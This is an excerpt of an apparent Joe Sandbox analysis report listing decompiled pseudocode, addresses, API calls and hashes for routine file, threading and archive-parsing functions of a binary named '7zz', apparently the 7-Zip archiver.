													_t71 =  *((intOrPtr*)(_t116 - 0x10)) + 0xffffffe0;
													 *((intOrPtr*)(_t116 - 0x14)) = 0;
													__eflags = _t71;
													 *((intOrPtr*)(_t116 - 0x1c)) = _t71;
													if(_t71 <= 0) {
														_t93 =  *((intOrPtr*)(_t116 - 0x18));
														goto L23;
													} else {
														while(1) {
															_t93 =  *((intOrPtr*)(_t116 - 0x18));
															while(1) {
																L15:
																__eflags =  *((char*)(_t104 + _t93)) - 0x37;
																if( *((char*)(_t104 + _t93)) == 0x37) {
																	break;
																}
																__eflags = _t104 - _t71;
																if(__eflags < 0) {
																	_t104 = _t104 + 1;
																	 *((intOrPtr*)(_t116 - 0x14)) = _t104;
																	continue;
																}
																L19:
																if(__eflags == 0) {
																	L23:
																	_t109 = _t109 + _t71;
																	asm("adc ebx, 0x0");
																	 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) - _t71;
																	L0046BAB0(_t93, _t71 + _t93,  *((intOrPtr*)(_t116 - 0x10)));
																	_t121 = _t121 + 0xc;
																	goto L4;
																} else {
																	_t75 = E0042D4DD(_t93 + _t104);
																	__eflags = _t75;
																	if(_t75 != 0) {
																		E0046C5C0(_t113 + 0x28,  *((intOrPtr*)(_t116 - 0x14)) +  *((intOrPtr*)(_t116 - 0x18)), 0x20);
																		_t110 = _t109 +  *((intOrPtr*)(_t116 - 0x14));
																		_t80 =  *((intOrPtr*)(_t116 + 8));
																		 *((intOrPtr*)(_t113 + 0x20)) = _t110;
																		_t98 = 0;
																		asm("adc ebx, ecx");
																		_t111 = _t110 + 0x20;
																		__eflags = _t111;
																		 *((intOrPtr*)(_t113 + 0x24)) = _t85;
																		asm("adc ebx, ecx");
																		_t67 =  *((intOrPtr*)( *_t80 + 0x10))(_t80, _t111, _t85, _t98, _t98);
																		goto L27;
																	} else {
																		 *((intOrPtr*)(_t116 - 0x14)) =  *((intOrPtr*)(_t116 - 0x14)) + 1;
																		__eflags =  *((intOrPtr*)(_t116 - 0x14)) -  *((intOrPtr*)(_t116 - 0x1c));
																		if( *((intOrPtr*)(_t116 - 0x14)) <  *((intOrPtr*)(_t116 - 0x1c))) {
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			_t104 =  *((intOrPtr*)(_t116 - 0x14));
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			continue;
																		} else {
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			goto L23;
																		}
																	}
																}
																goto L28;
															}
															__eflags = _t104 - _t71;
															goto L19;
														}
													}
												}
											}
											goto L28;
										}
										L27:
										_t115 = _t67;
									}
								}
							}
							L28:
							 *((intOrPtr*)(_t116 - 0x2c)) = 0x47a7ec;
							L00407A18( *((intOrPtr*)(_t116 - 0x24)));
							_t57 = _t115;
							goto L29;
						}
					} else {
						_t57 = 0;
					}
				}
				L29:
				 *[fs:0x0] =  *((intOrPtr*)(_t116 - 0xc));
				return _t57;
			}



























                                                                                  0x0042d341
                                                                                  0x0042d346
                                                                                  0x0042d34c
                                                                                  0x0042d353
                                                                                  0x0042d356
                                                                                  0x0042d35a
                                                                                  0x0042d361
                                                                                  0x0042d370
                                                                                  0x0042d379
                                                                                  0x0042d37b
                                                                                  0x0042d382
                                                                                  0x0042d385
                                                                                  0x0042d390
                                                                                  0x0042d393
                                                                                  0x0042d39e
                                                                                  0x0042d3a1
                                                                                  0x0042d3a4
                                                                                  0x0042d3a9
                                                                                  0x0042d3ac
                                                                                  0x0042d3af
                                                                                  0x0042d3b2
                                                                                  0x0042d3b2
                                                                                  0x0042d3b2
                                                                                  0x0042d3b5
                                                                                  0x0042d3b7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042d3bd
                                                                                  0x0042d3c0
                                                                                  0x0042d3c3
                                                                                  0x0042d3c6
                                                                                  0x0042d47c
                                                                                  0x0042d47e
                                                                                  0x0042d3cc
                                                                                  0x0042d3cc
                                                                                  0x00000000
                                                                                  0x0042d3ce
                                                                                  0x0042d3ce
                                                                                  0x0042d3d0
                                                                                  0x00000000
                                                                                  0x0042d3d6
                                                                                  0x0042d3d6
                                                                                  0x0042d3d6
                                                                                  0x0042d3e4
                                                                                  0x0042d3f3
                                                                                  0x0042d3f6
                                                                                  0x0042d3f8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042d3fe
                                                                                  0x0042d401
                                                                                  0x0042d404
                                                                                  0x0042d406
                                                                                  0x00000000
                                                                                  0x0042d408
                                                                                  0x0042d408
                                                                                  0x0042d40c
                                                                                  0x00000000
                                                                                  0x0042d40e
                                                                                  0x0042d411
                                                                                  0x0042d413
                                                                                  0x0042d416
                                                                                  0x0042d419
                                                                                  0x0042d41b
                                                                                  0x0042d41e
                                                                                  0x0042d477
                                                                                  0x00000000
                                                                                  0x0042d420
                                                                                  0x0042d428
                                                                                  0x0042d428
                                                                                  0x0042d42b
                                                                                  0x0042d42b
                                                                                  0x0042d42b
                                                                                  0x0042d42f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042d431
                                                                                  0x0042d433
                                                                                  0x0042d435
                                                                                  0x0042d436
                                                                                  0x00000000
                                                                                  0x0042d436
                                                                                  0x0042d43d
                                                                                  0x0042d43d
                                                                                  0x0042d45b
                                                                                  0x0042d45b
                                                                                  0x0042d45d
                                                                                  0x0042d460
                                                                                  0x0042d46a
                                                                                  0x0042d46f
                                                                                  0x00000000
                                                                                  0x0042d43f
                                                                                  0x0042d441
                                                                                  0x0042d446
                                                                                  0x0042d448
                                                                                  0x0042d490
                                                                                  0x0042d498
                                                                                  0x0042d49b
                                                                                  0x0042d4a0
                                                                                  0x0042d4a3
                                                                                  0x0042d4a4
                                                                                  0x0042d4a6
                                                                                  0x0042d4a6
                                                                                  0x0042d4a9
                                                                                  0x0042d4b0
                                                                                  0x0042d4b5
                                                                                  0x00000000
                                                                                  0x0042d44a
                                                                                  0x0042d44a
                                                                                  0x0042d450
                                                                                  0x0042d453
                                                                                  0x0042d422
                                                                                  0x0042d425
                                                                                  0x0042d428
                                                                                  0x00000000
                                                                                  0x0042d455
                                                                                  0x0042d455
                                                                                  0x0042d458
                                                                                  0x00000000
                                                                                  0x0042d458
                                                                                  0x0042d453
                                                                                  0x0042d448
                                                                                  0x00000000
                                                                                  0x0042d43d
                                                                                  0x0042d43b
                                                                                  0x00000000
                                                                                  0x0042d43b
                                                                                  0x0042d428
                                                                                  0x0042d41e
                                                                                  0x0042d40c
                                                                                  0x00000000
                                                                                  0x0042d406
                                                                                  0x0042d4b8
                                                                                  0x0042d4b8
                                                                                  0x0042d4b8
                                                                                  0x0042d3d0
                                                                                  0x0042d3cc
                                                                                  0x0042d4ba
                                                                                  0x0042d4bd
                                                                                  0x0042d4c4
                                                                                  0x0042d4ca
                                                                                  0x00000000
                                                                                  0x0042d4ca
                                                                                  0x0042d372
                                                                                  0x0042d372
                                                                                  0x0042d372
                                                                                  0x0042d370
                                                                                  0x0042d4cc
                                                                                  0x0042d4d2
                                                                                  0x0042d4da

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: $c[@
                                                                                  • API String ID: 3519838083-1303465990
                                                                                  • Opcode ID: 69068367b15dc9bd673a90d53c0485621dc67a4ad571aeb8f90f6fb8c481df08
                                                                                  • Instruction ID: dbd63947d3ec36f6418aa11a5244a4fc3f7eb44a15ca7d926c0188e08944aa22
                                                                                  • Opcode Fuzzy Hash: 69068367b15dc9bd673a90d53c0485621dc67a4ad571aeb8f90f6fb8c481df08
                                                                                  • Instruction Fuzzy Hash: 8851A3B1F002199BDB14DFA9D881ABFB7B5FF88304F50852AE405E7340D778A9418B65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046CD08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2773 46cd08-46cd1e call 46fe93 2776 46cd20-46cd51 call 46e370 CreateThread 2773->2776 2777 46cd5b-46cd64 call 46c0ff 2773->2777 2782 46cd53-46cd59 GetLastError 2776->2782 2783 46cd6f-46cd72 2776->2783 2784 46cd66-46cd6c call 4705d3 2777->2784 2785 46cd6d 2777->2785 2782->2777 2784->2785 2785->2783
                                                                                  C-Code - Quality: 100%
                                                                                  			E0046CD08(struct _SECURITY_ATTRIBUTES* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				void* _t18;
				long _t25;
				void* _t26;

				_t25 = 0;
				_t26 = L0046FE93(1, 0x74);
				if(_t26 == 0) {
					L3:
					E0046C0FF(_t26);
					if(_t25 != 0) {
						E004705D3(_t25);
					}
					return 0;
				}
				E0046E370(_t26);
				 *(_t26 + 4) =  *(_t26 + 4) | 0xffffffff;
				 *((intOrPtr*)(_t26 + 0x48)) = _a12;
				 *((intOrPtr*)(_t26 + 0x4c)) = _a16;
				_t9 =  &_a8; // 0x414677
				_t18 = CreateThread(_a4,  *_t9, E0046CD73, _t26, _a20, _a24); // executed
				if(_t18 == 0) {
					_t25 = GetLastError();
					goto L3;
				}
				return _t18;
			}






                                                                                  0x0046cd11
                                                                                  0x0046cd18
                                                                                  0x0046cd1e
                                                                                  0x0046cd5b
                                                                                  0x0046cd5c
                                                                                  0x0046cd64
                                                                                  0x0046cd67
                                                                                  0x0046cd6c
                                                                                  0x00000000
                                                                                  0x0046cd6d
                                                                                  0x0046cd21
                                                                                  0x0046cd2d
                                                                                  0x0046cd31
                                                                                  0x0046cd3a
                                                                                  0x0046cd43
                                                                                  0x0046cd49
                                                                                  0x0046cd51
                                                                                  0x0046cd59
                                                                                  0x00000000
                                                                                  0x0046cd59
                                                                                  0x0046cd72

                                                                                  APIs
                                                                                    • Part of subcall function 0046FE93: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046FF89
                                                                                  • CreateThread.KERNELBASE ref: 0046CD49
                                                                                  • GetLastError.KERNEL32(?,00467AE9,00000000,00000000,004148ED,?,00000000,?,?,00414677,?,?), ref: 0046CD53
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocCreateErrorHeapLastThread
                                                                                  • String ID: wFA
                                                                                  • API String ID: 3580101977-151469634
                                                                                  • Opcode ID: b7a88149dd98dfaf9bb2c186dc88153770bf2f3049edd001e68c2968dc4fa82c
                                                                                  • Instruction ID: 3bcaffb1de1f861aa2c0b81efa8886cf09e347fde19023c9913c4d3a853d5ec3
                                                                                  • Opcode Fuzzy Hash: b7a88149dd98dfaf9bb2c186dc88153770bf2f3049edd001e68c2968dc4fa82c
                                                                                  • Instruction Fuzzy Hash: 0DF0F4366006116BDB209F66EC41DAB3FA5DF81771B10443FFA5C82690EB3988518BAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00409A29 Relevance: 4.6, APIs: 3, Instructions: 65COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2788 409a29-409a44 __EH_prolog 2789 409a46-409a68 call 409ad5 call 4099a0 call 407a18 2788->2789 2790 409a6a-409a76 SetFileAttributesW 2788->2790 2796 409ac6-409ad4 2789->2796 2792 409a78-409a7a 2790->2792 2793 409a7c-409aa1 call 401e9a call 40b863 2790->2793 2792->2796 2803 409aa3-409ab9 SetFileAttributesW call 407a18 2793->2803 2804 409abb-409ac4 call 407a18 2793->2804 2803->2796 2804->2796
                                                                                  C-Code - Quality: 100%
                                                                                  			E00409A29(WCHAR* __ecx, long __edx) {
				int _t18;
				signed int _t23;
				int _t24;
				signed int _t28;
				void* _t54;

				L0046B890(0x473a24, _t54);
				_t48 = __edx;
				if( *0x490a7c != 0) {
					_t18 = SetFileAttributesW(__ecx, __edx); // executed
					if(_t18 == 0) {
						 *(_t54 - 0x18) = 0;
						 *((intOrPtr*)(_t54 - 0x14)) = 0;
						 *((intOrPtr*)(_t54 - 0x10)) = 0;
						E00401E9A(_t54 - 0x18, 3);
						 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
						if(L0040B863(_t54 - 0x18) == 0) {
							L00407A18( *(_t54 - 0x18));
							_t23 = 0;
						} else {
							_t24 = SetFileAttributesW( *(_t54 - 0x18), _t48);
							_t23 = L00407A18( *(_t54 - 0x18)) & 0xffffff00 | _t24 != 0x00000000;
						}
					} else {
						_t23 = 1;
					}
				} else {
					_t28 = E004099A0( *((intOrPtr*)(E00409AD5(_t54 - 0x24, __ecx))), __edx);
					L00407A18( *((intOrPtr*)(_t54 - 0x24)));
					_t23 = _t28;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
				return _t23;
			}








                                                                                  0x00409a2e
                                                                                  0x00409a40
                                                                                  0x00409a44
                                                                                  0x00409a72
                                                                                  0x00409a76
                                                                                  0x00409a83
                                                                                  0x00409a86
                                                                                  0x00409a89
                                                                                  0x00409a8c
                                                                                  0x00409a91
                                                                                  0x00409aa1
                                                                                  0x00409abe
                                                                                  0x00409ac4
                                                                                  0x00409aa3
                                                                                  0x00409aa7
                                                                                  0x00409ab6
                                                                                  0x00409ab6
                                                                                  0x00409a78
                                                                                  0x00409a78
                                                                                  0x00409a78
                                                                                  0x00409a46
                                                                                  0x00409a56
                                                                                  0x00409a60
                                                                                  0x00409a66
                                                                                  0x00409a66
                                                                                  0x00409acc
                                                                                  0x00409ad4

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00409A2E
                                                                                  • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00409A72
                                                                                    • Part of subcall function 00409AD5: __EH_prolog.LIBCMT ref: 00409ADA
                                                                                    • Part of subcall function 00409AD5: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00409AF6
                                                                                    • Part of subcall function 004099A0: SetFileAttributesA.KERNEL32(?,?,00409A5B,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004099A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesH_prolog$Apis
                                                                                  • String ID:
                                                                                  • API String ID: 1724483454-0
                                                                                  • Opcode ID: 43186953be5daf0de57b10679b82a724e15aa266f1dac7b6fd580aaf3804a6e7
                                                                                  • Instruction ID: 62381452fa1776ecf317f5749025f9a102d19c157996ae2428c02df752bbe2da
                                                                                  • Opcode Fuzzy Hash: 43186953be5daf0de57b10679b82a724e15aa266f1dac7b6fd580aaf3804a6e7
                                                                                  • Instruction Fuzzy Hash: 9B116372F002459BCF04EF6698426AEBBB9DF85354F14443FE501B72D2DA3C4E059BA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040E6D6 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2810 40e6d6-40e70a __EH_prolog EnterCriticalSection call 40d340 2812 40e70c-40e71a call 40d071 2810->2812 2813 40e71d-40e735 LeaveCriticalSection 2810->2813 2812->2813
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040E6D6(intOrPtr* __ecx) {
				intOrPtr* _t15;
				void* _t16;
				void* _t22;
				struct _CRITICAL_SECTION* _t23;
				void* _t25;
				intOrPtr* _t26;
				intOrPtr* _t29;
				void* _t30;

				L0046B890(E00474014, _t30);
				_t26 = __ecx;
				_t23 = __ecx + 4;
				 *(_t30 - 0x10) = _t23;
				EnterCriticalSection(_t23);
				_t15 =  *_t26;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				_t16 =  *((intOrPtr*)( *_t15 + 0x10))(_t15,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), 0, 0, _t22, _t25, __ecx);
				if(_t16 == 0) {
					_t29 =  *_t26;
					_t16 =  *((intOrPtr*)( *_t29 + 0xc))(_t29,  *((intOrPtr*)(_t30 + 0x10)),  *((intOrPtr*)(_t30 + 0x14)),  *((intOrPtr*)(_t30 + 0x18)));
				}
				LeaveCriticalSection(_t23);
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t16;
			}











                                                                                  0x0040e6db
                                                                                  0x0040e6e2
                                                                                  0x0040e6e5
                                                                                  0x0040e6e9
                                                                                  0x0040e6ec
                                                                                  0x0040e6f2
                                                                                  0x0040e6f8
                                                                                  0x0040e705
                                                                                  0x0040e70a
                                                                                  0x0040e70f
                                                                                  0x0040e71a
                                                                                  0x0040e71a
                                                                                  0x0040e720
                                                                                  0x0040e72d
                                                                                  0x0040e735

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040E6DB
                                                                                  • EnterCriticalSection.KERNEL32(00000000,?,?,?,0040E75C,?,?,?,?,?), ref: 0040E6EC
                                                                                  • LeaveCriticalSection.KERNEL32(00000000,?,?,?,0040E75C,?,?,?,?,?), ref: 0040E720
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterH_prologLeave
                                                                                  • String ID:
                                                                                  • API String ID: 367238759-0
                                                                                  • Opcode ID: 049483b65675be0fe03f61d34f865e17871a24ff9367e82253095f38623ff512
                                                                                  • Instruction ID: e741d22780284c861742e84a626bb0d46a40b6509f00f1721e03e5846f5cf661
                                                                                  • Opcode Fuzzy Hash: 049483b65675be0fe03f61d34f865e17871a24ff9367e82253095f38623ff512
                                                                                  • Instruction Fuzzy Hash: EA011D76A00214AFCB119F94CC08B9EB7B9FF88711F10886AFD05E7250C774A950DF64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0042EC5C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 315COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 88%
                                                                                  			E0042EC5C(intOrPtr* __ecx, void* __eflags) {
				char* _t134;
				void* _t139;
				intOrPtr _t140;
				signed int _t143;
				intOrPtr* _t144;
				signed int _t146;
				void* _t148;
				void* _t152;
				signed int _t156;
				void* _t160;
				intOrPtr* _t171;
				intOrPtr* _t172;
				void* _t174;
				intOrPtr _t178;
				intOrPtr _t182;
				intOrPtr* _t183;
				signed int _t186;
				intOrPtr _t221;
				intOrPtr* _t222;
				void* _t224;
				void* _t228;
				signed int _t232;
				intOrPtr _t239;
				signed int _t240;
				intOrPtr _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t248;
				intOrPtr* _t252;
				signed int _t254;
				void* _t255;

				L0046B890(0x477698, _t255);
				_t243 =  *((intOrPtr*)(_t255 + 8));
				_t252 = __ecx;
				L0042B5A9(_t243);
				 *((intOrPtr*)(_t243 + 0x138)) =  *((intOrPtr*)(_t252 + 0x20));
				 *((intOrPtr*)(_t243 + 0x13c)) =  *((intOrPtr*)(_t252 + 0x24));
				_t134 = _t243 + 0x130;
				 *_t134 =  *((intOrPtr*)(_t252 + 0x2e));
				_t193 =  *((intOrPtr*)(_t252 + 0x2f));
				 *((char*)(_t243 + 0x131)) =  *((intOrPtr*)(_t252 + 0x2f));
				if( *_t134 != 0) {
					E0042D0F8(_t193);
				}
				_t244 =  *(_t252 + 0x34);
				 *((intOrPtr*)(_t255 - 0x18)) =  *((intOrPtr*)(_t252 + 0x30));
				_t186 =  *(_t252 + 0x38);
				 *(_t255 - 0x14) =  *(_t252 + 0x3c);
				 *(_t255 - 0x10) =  *(_t252 + 0x40);
				 *((intOrPtr*)(_t255 - 0x48)) =  *((intOrPtr*)(_t252 + 0x44));
				_t228 = 0x14;
				_t139 = L0046B1C0(_t252 + 0x34, _t228);
				if( *((intOrPtr*)(_t255 - 0x18)) != 0 || (_t244 | _t186) != 0 || ( *(_t255 - 0x14) |  *(_t255 - 0x10)) != 0 ||  *((intOrPtr*)(_t255 - 0x48)) != 0) {
					__eflags = _t139 -  *((intOrPtr*)(_t255 - 0x18));
					if(_t139 !=  *((intOrPtr*)(_t255 - 0x18))) {
						E0042D0F8(0);
					}
					goto L24;
				} else {
					_t171 =  *_t252;
					_t143 =  *((intOrPtr*)( *_t171 + 0x10))(_t171, 0, 0, 1, _t255 - 0x1c);
					if(_t143 != 0) {
						L55:
						 *[fs:0x0] =  *((intOrPtr*)(_t255 - 0xc));
						return _t143;
					}
					_t172 =  *_t252;
					_t143 =  *((intOrPtr*)( *_t172 + 0x10))(_t172, 0, 0, 2, _t255 - 0x24);
					if(_t143 != 0) {
						goto L55;
					}
					_t221 =  *((intOrPtr*)(_t255 - 0x24));
					_t239 =  *((intOrPtr*)(_t255 - 0x20));
					_t248 = 0x1f4;
					_t174 = _t221 -  *((intOrPtr*)(_t255 - 0x1c));
					asm("sbb edx, [ebp-0x18]");
					 *((intOrPtr*)(_t255 - 0x48)) = _t239;
					if(_t174 == 0 && _t174 < 0x1f4) {
						_t248 = _t221 -  *((intOrPtr*)(_t255 - 0x1c));
					}
					_t222 =  *_t252;
					asm("cdq");
					_t143 =  *((intOrPtr*)( *_t222 + 0x10))(_t222,  ~_t248, _t239, 2, _t255 - 0x24);
					_t271 = _t143;
					if(_t143 == 0) {
						_t240 = _t255 - 0x248;
						_t143 = E0040FAC0(_t271, _t248);
						if(_t143 != 0) {
							goto L55;
						}
						_t37 = _t248 - 2; // 0x1f2
						_t224 = _t37;
						if(_t224 < 0) {
							L31:
							_t143 = 1;
							goto L55;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t178 =  *((intOrPtr*)(_t255 + _t224 - 0x248));
							if(_t178 == 0x17 &&  *((char*)(_t255 + _t224 - 0x247)) == 6) {
								break;
							}
							if(_t178 != 1 ||  *((char*)(_t255 + _t224 - 0x247)) != 4) {
								_t224 = _t224 - 1;
								if(_t224 >= 0) {
									continue;
								}
							}
							break;
						}
						if(_t224 < 0) {
							goto L31;
						}
						asm("cdq");
						 *(_t255 - 0x14) = _t248 - _t224;
						 *(_t255 - 0x10) = _t240;
						asm("cdq");
						_t186 = _t240;
						asm("sbb ebx, [ebp-0x18]");
						_t244 = _t224 -  *((intOrPtr*)(_t255 - 0x1c)) +  *((intOrPtr*)(_t255 - 0x24));
						asm("adc ebx, [ebp-0x20]");
						_t182 = L0046B1C0(_t255 + _t224 - 0x248,  *(_t255 - 0x14));
						 *((intOrPtr*)(_t255 - 0x48)) = _t182;
						_t183 =  *_t252;
						_t143 =  *((intOrPtr*)( *_t183 + 0x10))(_t183,  *((intOrPtr*)(_t255 - 0x1c)),  *((intOrPtr*)(_t255 - 0x18)), 0, 0);
						if(_t143 == 0) {
							L24:
							_t140 =  *((intOrPtr*)(_t255 + 8));
							asm("adc edx, 0x0");
							 *((intOrPtr*)(_t140 + 0x140)) =  *((intOrPtr*)(_t252 + 0x20)) + 0x20;
							 *((intOrPtr*)(_t140 + 0x144)) =  *((intOrPtr*)(_t252 + 0x24));
							__eflags =  *(_t255 - 0x14) |  *(_t255 - 0x10);
							if(( *(_t255 - 0x14) |  *(_t255 - 0x10)) != 0) {
								__eflags =  *(_t255 - 0x10);
								if( *(_t255 - 0x10) > 0) {
									goto L31;
								}
								__eflags =  *(_t255 - 0x14) - 0xffffffff;
								if( *(_t255 - 0x14) > 0xffffffff) {
									goto L31;
								}
								__eflags = _t186;
								if(__eflags > 0) {
									L32:
									_t144 =  *_t252;
									_t143 =  *((intOrPtr*)( *_t144 + 0x10))(_t144, _t244, _t186, 1, 0);
									__eflags = _t143;
									if(_t143 != 0) {
										goto L55;
									}
									 *((intOrPtr*)(_t255 - 0x2c)) = 0;
									 *((intOrPtr*)(_t255 - 0x28)) = 0;
									 *((intOrPtr*)(_t255 - 0x30)) = 0x47a7ec;
									 *(_t255 - 4) = 0;
									L0040FA26(_t255 - 0x30,  *(_t255 - 0x14));
									_t146 = E0040FAC0(__eflags,  *(_t255 - 0x14)); // executed
									__eflags = _t146;
									if(_t146 == 0) {
										asm("adc edx, 0x0");
										 *((intOrPtr*)(_t252 + 0x48)) =  *((intOrPtr*)(_t252 + 0x48)) +  *(_t255 - 0x14) + 0x20;
										asm("adc [esi+0x4c], edx");
										_t232 =  *(_t255 - 0x14);
										_t246 =  *((intOrPtr*)(_t255 + 8));
										asm("adc eax, ebx");
										asm("adc eax, 0x0");
										 *((intOrPtr*)(_t246 + 0x1c8)) = _t232 + _t244 + 0x20;
										_t208 =  *((intOrPtr*)(_t255 - 0x28));
										 *(_t246 + 0x1cc) =  *(_t255 - 0x10);
										_t148 = L0046B1C0( *((intOrPtr*)(_t255 - 0x28)), _t232);
										__eflags = _t148 -  *((intOrPtr*)(_t255 - 0x48));
										if(_t148 !=  *((intOrPtr*)(_t255 - 0x48))) {
											E0042D0F8(_t208);
										}
										 *(_t255 - 0x50) =  *(_t255 - 0x50) & 0x00000000;
